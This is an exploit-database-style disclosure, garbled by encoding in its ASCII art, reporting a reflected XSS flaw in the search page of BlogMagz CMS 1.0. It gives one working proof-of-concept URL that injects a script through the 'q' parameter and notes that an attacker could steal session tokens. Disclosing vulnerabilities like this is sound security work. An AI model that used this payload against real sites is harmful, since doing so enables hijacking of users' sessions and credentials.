ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
ââ                                     C r a C k E r                                    ââ
ââ                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ

 âââââ              From The Ashes and Dust Rises An Unimaginable crack....          âââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
ââ                                  [ Vulnerability ]                                   ââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
:  Author   : CraCkEr                                                                    :
â  Website  : techrobot.in                                                               â
â  Vendor   : Tech Robot                                                                 â
â  Software : BlogMagz CMS 1.0                                                           â
â  Vuln Type: Reflected XSS                                                              â
â  Method   : GET                                                                        â
â  Impact   : Manipulate the content of the site                                         â
â                                                                                        â
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
â                                                                                       ââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
:                                                                                        :
â  Release Notes:                                                                        â
â  âââââââââââââ                                                                         â
â  The attacker can send to victim a link containing a malicious URL in an email or      â
â  instant message can perform a wide variety of actions, such as stealing the victim's  â
â  session token or login credentials                                                    â
â                                                                                        â
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
ââ                                                                                      ââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
ââ                                    ÂŠ CraCkEr 2023                                    ââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ


Path: /search

GET parameter 'q' is vulnerable to RXSS

https://website/blogmagz/search?q=123rto10%3cscript%3ealert(1)%3c%2fscript%3efffyz


[-] Done